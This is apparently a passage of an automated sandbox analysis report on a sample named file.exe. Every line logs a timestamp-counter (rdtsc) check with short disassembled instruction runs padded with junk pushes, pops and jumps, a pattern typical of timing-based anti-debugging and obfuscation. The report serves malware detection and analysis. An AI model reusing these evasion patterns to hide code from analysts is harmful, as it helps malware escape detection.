Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6644E4 second address: 6644EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6647C5 second address: 6647D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6647D4 second address: 6647DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 669DF7 second address: 669E14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 669E14 second address: 669E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 669F4C second address: 669F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66A1F3 second address: 66A210 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F6E644F7533h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66A210 second address: 66A217 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66A217 second address: 66A234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F6E644F7531h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66A234 second address: 66A260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C0h 0x00000007 jnp 00007F6E64DC24B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F6E64DC24BFh 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66AA64 second address: 66AA78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F6E644F752Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66AA78 second address: 66AA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66AA81 second address: 66AA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66ABD2 second address: 66ABD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E650 second address: 66E656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E656 second address: 66E65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E081 second address: 66E090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6E644F7526h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E090 second address: 66E096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E096 second address: 66E09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E09A second address: 66E09E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E09E second address: 66E0BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7533h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E0BC second address: 66E0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E1FF second address: 66E21E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jne 00007F6E644F7526h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jng 00007F6E644F7526h 0x00000013 pop edx 0x00000014 pushad 0x00000015 ja 00007F6E644F7526h 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E21E second address: 66E230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007F6E64DC24B6h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E230 second address: 66E236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 66E236 second address: 66E23A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 675E6B second address: 675E82 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6E644F7531h 0x00000008 jmp 00007F6E644F752Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 675E82 second address: 675E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 676124 second address: 676147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007F6E644F753Ah 0x0000000b jmp 00007F6E644F7534h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 676147 second address: 67614B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67614B second address: 67614F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67614F second address: 676155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6765B7 second address: 6765D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F6E644F7526h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jnc 00007F6E644F7526h 0x00000011 ja 00007F6E644F7526h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6765D0 second address: 6765DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6765DD second address: 6765E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6765E3 second address: 6765E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 676871 second address: 67689E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F752Bh 0x00000009 pop esi 0x0000000a pushad 0x0000000b jmp 00007F6E644F7535h 0x00000010 jo 00007F6E644F7526h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6772C9 second address: 6772EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6E64DC24B6h 0x0000000a jmp 00007F6E64DC24C7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6772EA second address: 6772EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6772EE second address: 677305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 jbe 00007F6E64DC24B6h 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 677305 second address: 67731F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7536h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67731F second address: 677329 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E64DC24B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67A7B6 second address: 67A7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6E644F752Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67A7C7 second address: 67A7CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67A7CC second address: 67A7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67A7D2 second address: 67A7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6E64DC24C1h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67A7EE second address: 67A7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67A967 second address: 67A96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67B055 second address: 67B05B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67EBF1 second address: 67EBF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67EBF5 second address: 67EC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7536h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67EC11 second address: 67EC28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67EC28 second address: 67EC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67ED9B second address: 67EDA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67EDA5 second address: 67EDA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67F04F second address: 67F05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6E64DC24B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67F05A second address: 67F07F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E644F7539h 0x00000008 jmp 00007F6E644F7533h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67F07F second address: 67F083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67F083 second address: 67F09D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7536h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67F09D second address: 67F0A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 67F0A3 second address: 67F0B2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EAD1B second address: 5EAD2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6860EE second address: 6860F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6860F2 second address: 6860FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686273 second address: 686280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686568 second address: 68656E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686851 second address: 686861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F6E644F752Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686861 second address: 686873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F6E64DC24C2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686873 second address: 686880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6E644F7526h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686880 second address: 686885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686DB4 second address: 686DBC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686DBC second address: 686DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jbe 00007F6E64DC24B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686DC8 second address: 686DEA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6E644F7526h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jc 00007F6E644F7526h 0x00000013 jnp 00007F6E644F7526h 0x00000019 pop ebx 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686DEA second address: 686E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C4h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 686E04 second address: 686E09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 687638 second address: 68763C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68C8CC second address: 68C8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68C8D0 second address: 68C8FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jg 00007F6E64DC24BCh 0x0000000e jmp 00007F6E64DC24C8h 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68C8FF second address: 68C905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68C905 second address: 68C914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007F6E64DC24B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68C914 second address: 68C918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68BFB4 second address: 68BFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68BFB8 second address: 68BFBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68C104 second address: 68C10E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68C10E second address: 68C112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68C2A3 second address: 68C2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68C533 second address: 68C537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68C537 second address: 68C56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24BBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F6E64DC24C9h 0x00000014 push esi 0x00000015 jnl 00007F6E64DC24B6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68C56D second address: 68C572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68C572 second address: 68C58E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pushad 0x00000008 je 00007F6E64DC24B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 699A7D second address: 699A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 699A87 second address: 699A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F6E64DC24B8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 699A9D second address: 699ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F6E644F7526h 0x0000000b jmp 00007F6E644F7530h 0x00000010 popad 0x00000011 jo 00007F6E644F7536h 0x00000017 jmp 00007F6E644F752Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 699ACB second address: 699AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6E64DC24BDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 699AE0 second address: 699B14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7532h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6E644F7538h 0x0000000e ja 00007F6E644F7526h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 697BE8 second address: 697BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69827E second address: 698282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6983DC second address: 6983E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 69852A second address: 698530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 698530 second address: 698538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6987B7 second address: 6987BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6987BC second address: 6987C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6987C2 second address: 6987C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6987C6 second address: 6987CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6987CA second address: 6987EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6E644F7535h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
